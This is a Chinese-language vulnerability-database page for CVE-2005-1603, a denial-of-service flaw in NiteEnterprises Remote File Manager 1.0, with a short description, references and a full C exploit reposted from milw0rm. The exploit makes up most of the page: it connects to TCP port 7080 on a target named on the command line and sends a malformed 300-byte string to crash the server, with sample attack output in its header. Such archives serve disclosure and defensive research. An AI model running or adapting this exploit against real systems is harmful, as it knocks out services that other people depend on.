NiteEnterprises Remote File Manager拒绝服务漏洞

NiteEnterprises Remote File Manager拒绝服务漏洞

漏洞ID 1108761 漏洞类型 其他
发布时间 2005-05-08 更新时间 2005-10-20
图片[1]-NiteEnterprises Remote File Manager拒绝服务漏洞-安全小百科CVE编号 CVE-2005-1603
图片[2]-NiteEnterprises Remote File Manager拒绝服务漏洞-安全小百科CNNVD-ID CNNVD-200505-1068
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/988
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-1068
|漏洞详情
NiteEnterprisesRemoteFileManager1.0允许远程攻击者通过发到TCP端口7080的特制的字符串来发起拒绝服务攻击(崩溃)。
|漏洞EXP
/*

 Server Remote File Manager DoS Exploit
-------------------------------------------
  INFGP - Hacking&security Research

[+] Attacking  localhost..
[+] Build DOS string
[+] Buffer size = 300 byte
[+] Sending bad format..
[+] localhost  : Disconected!

Greats: Infam0us Gr0up,Zone-H,securiteam,str0ke-milw0rm,addict3d,
Thomas-secunia,Yudha,c0d3r,Kavling Community,1st Indonesian Security,
Jasakom,ECHO,etc..betst reagrds t0 whell.
Info: 98.to/infamous

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define size 300

int main (int argc, char *argv[]){

char req[] =
"M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-YSYNKG&MKL?X.JIY.HS&"
"<GMN?X+9M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-YSYNKG&MKL?"
"X.JIY.HS&<GMN?X+9M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-YSYN"
"KG&MKL?X.JIY.HS&<GMN?X+9M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-"
"qv#trog.ro#mkodph>qv#trog.ro#mkodphn";

 unsigned int rc,addr,inetsock ;
 struct sockaddr_in tcp;
 struct hostent * hp;
 WSADATA wsaData;
 char buffer[size];

  memset(buffer,'A',300);
  memcpy(buffer,req,25);

  if(argc < 2) {
 printf("nn    Server Remote File Manager DoS Exploit n", argv[0]);
 printf("   -----------------------------------------n", argv[0]);
 printf("      INFGP - Hacking&Security Researchnn", argv[0]);
 printf("[-]Usage: %s [target]n", argv[0]);
 printf("[?]Exam: %s localhost n", argv[0]);
 exit(-1) ;
       }

 if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
  printf("WSAStartup failed !n");
  exit(-1);
 }
  hp = gethostbyname(argv[1]);
 if (!hp){
  addr = inet_addr(argv[1]);
 }
 if ((!hp) && (addr == INADDR_NONE) ){
  printf("Unable to resolve %sn",argv[1]);
  exit(-1);
 }
 inetsock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
 if (!inetsock){
  printf("socket() error...n");
  exit(-1);
 }
  if (hp != NULL)
  memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
 else
  tcp.sin_addr.s_addr = addr;

 if (hp)
  tcp.sin_family = hp->h_addrtype;
 else
  tcp.sin_family = AF_INET;

 tcp.sin_port=htons(7080);

 printf("n[+] Attacking  %s..n" , argv[1]) ;
 printf("[+] Build DOS stringn");
 Sleep(1000);
 printf("[+] Buffer size = %d byten" , sizeof(buffer));
 rc=connect(inetsock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
 if(rc==0)
 {

 Sleep(1000) ;
 printf("[+] Sending bad format..n") ;
 send(inetsock , buffer , sizeof(buffer) , 0);
 printf("[+] %s  : Disconected! nn" ,  argv[1]) ;
}
 else {
 printf("[-] Port :7080 is invalid.Server not connected!n");
}
}

// milw0rm.com [2005-05-08]
|参考资料

来源:BID
名称:13550
链接:http://www.securityfocus.com/bid/13550
来源:OSVDB
名称:16158
链接:http://www.osvdb.org/16158
来源:VUPEN
名称:ADV-2005-0501
链接:http://www.frsirt.com/english/advisories/2005/0501
来源:SECUNIA
名称:15299
链接:http://secunia.com/advisories/15299
来源:FULLDISC
名称:20050508ServerRemoteFileManagerDOSExploit
链接:http://archives.neohapsis.com/archives/fulldisclosure/2005-05/0129.html

相关推荐: Moodle ‘post.php’ Cross-Site Scripting Vulnerability

Moodle ‘post.php’ Cross-Site Scripting Vulnerability 漏洞ID 1098154 漏洞类型 Input Validation Error 发布时间 2004-08-06 更新时间 2004-08-06 CVE编…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享